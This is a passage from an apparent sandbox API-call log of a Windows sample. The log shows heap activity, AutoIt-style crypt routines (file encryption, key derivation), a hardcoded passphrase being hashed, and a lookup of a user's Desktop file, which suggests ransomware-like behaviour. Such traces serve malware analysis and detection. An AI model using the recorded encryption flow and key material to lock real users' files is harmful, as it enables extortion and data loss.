dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392228 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0123.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0123.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0123.122] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0123.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ce0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0123.122] CloseHandle (hObject=0x2a0) returned 1 [0123.122] FreeLibrary (hLibModule=0x772d0000) returned 1 [0123.122] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0123.122] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\I4IMK8uPkmw_W.mp3", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e9bb8c0, ftCreationTime.dwHighDateTime=0x1d5f068, ftLastAccessTime.dwLowDateTime=0xfa80a9c0, ftLastAccessTime.dwHighDateTime=0x1d5eca6, ftLastWriteTime.dwLowDateTime=0xfa80a9c0, ftLastWriteTime.dwHighDateTime=0x1d5eca6, nFileSizeHigh=0x0, nFileSizeLow=0x7f8f, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="I4IMK8uPkmw_W.mp3", cAlternateFileName="I4IMK8~1.MP3")) returned 0x41ac100 [0123.123] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0123.123] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0123.123] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.123] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0123.123] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.123] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0123.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0123.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0123.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0123.123] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0123.124] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0123.124] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0123.124] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0123.124] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0123.124] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.124] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0123.124] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.124] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0123.124] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0123.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca9d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0123.140] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0123.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0123.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0123.140] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0123.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0123.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0123.140] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.140] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0123.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca958, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0123.140] CryptHashData (hHash=0x41ac180, pbData=0x17e2668, dwDataLen=0x22, dwFlags=0x1) returned 1 [0123.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0123.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0123.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0123.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0123.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0123.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0123.142] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0123.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0123.142] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0123.142] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0123.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0123.142] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0123.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0123.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0123.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0123.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0123.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0123.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0123.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0123.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0123.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0123.143] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0123.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0123.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0123.143] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0123.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0123.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0123.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0123.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0123.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0123.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0123.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0123.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0123.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0123.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0123.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0123.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0123.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0123.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0123.144] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0123.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0123.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0123.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0123.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0123.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0123.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0123.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0123.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0123.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0123.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0123.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0123.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0123.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0123.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0123.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0123.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0123.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0123.145] 